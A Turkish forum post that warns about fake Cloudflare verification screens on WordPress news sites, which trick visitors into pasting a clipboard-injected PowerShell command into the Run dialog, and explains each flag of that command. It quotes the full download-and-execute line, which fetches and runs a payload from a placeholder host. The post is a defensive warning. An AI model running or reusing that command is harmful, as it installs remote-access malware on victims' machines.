Selamlar, daha önce hiç karşılaşmamış olmama rağmen bugün 4 farklı haber sitesinde sahte cloudflare ekranı karşıma çıktı. Arka arkaya bununla karşılaşınca biraz detaylı inceleyip araştırdım.
Sahte Cloudflare Görüntüsü
Sahte Doğrulamaya Tıklayınca.. Sahte Cloudflare Win+R ile Amaç Ne?
Sahte cloudflare ekranı ile amaç bilgisayarınıza RAT benzeri zararlı yazılım yüklemek. Peki nasıl çalışıyor?
Muhtemelen gizli bir javascript kodu ile doğrulama ekranını karşımıza çıkartıyorlar. Bu js kodu içerisindeki bir betik ile de otomatik olarak powershell komutu kopyalama işlemini gerçekleştiriyorlar.
Sözde doğrulama adımlarını tamamlamak için kullanıcılar win+r ile run command'ı açıp ctrl+v ile yapıştırma işlemi yaptığında zararlı yazılım direkt olarak sisteme kuruluyor ve saldırgana tam erişim hakkı verebiliyor. Bu işlemde şu komut ile karşılaşıyoruz:
powershell -ep bypass -enc -NoP -NonI -EP Bypass /w h -C icm ([ScriptBlock]::Create((iwr "https://süphelisiteadi.com/progsplit.exe.exe" -Method POST).Content))
Bu komut ne yapıyor?
powershell -ep bypass: PowerShell'in "execution policy" (çalıştırma politikası) özelliğini geçici olarak devre dışı bırakır. PowerShell betiklerinin engellenmeden çalıştırılabilmesini sağlar ve kötü niyetli yazılımlar için yaygın bir taktiktir.
-enc: Komutun "encoded" (şifrelenmiş) olduğunu gösterir. Kötü amaçlı yazılımların ve zararlı kodların gizlenmesine yardımcı olur.
-NoP: PowerShell oturumunda herhangi bir profil (veya konfigürasyon dosyası) yüklenmesini engeller. Komutun iz bırakmadan çalışmasına olanak tanır.
-NonI: PowerShell'in interaktif modda çalışmamasını sağlar. Komutun geri bildirim vermemesini ve komut satırında herhangi bir etkileşimde bulunmamasını sağlar.
-EP Bypass: PowerShell'e belirli güvenlik kontrollerini atlaması talimatını verir.
iwr "https://süphelisiteadi.com/progsplit.exe.exe" -Method POST: iwr, PowerShell'deki Invoke-WebRequest komutunun kısaltmasıdır. Bu komut, belirtilen URL'den dosya indirir.
.Content: İndirilen dosyanın içeriğini alır ve çalıştırır. Burada, URL'nin sonunda bir .exe.exe uzantısı bulunuyor. Dosyanın çift uzantısı, güvenlik yazılımlarından kaçmak için kullanılır.
Komutu çalıştırmadığınız sürece bir zararı yok. Sahte cloudflare ekranıyla karşılaşırsanız panonuzdan zararlı komutu silmeyi unutmayın.
Sayfaya birkaç kez refresh attıktan sonra sahte cloudflare ekranı kalkıyor ve siteye giriş yapabiliyoruz. Karşılaştığım 4 sitede wordpress altyapısını kullanıyor. W*rez tema/eklenti kaynaklı olabilir. Dikkat etmekte fayda var.
İyi forumlar.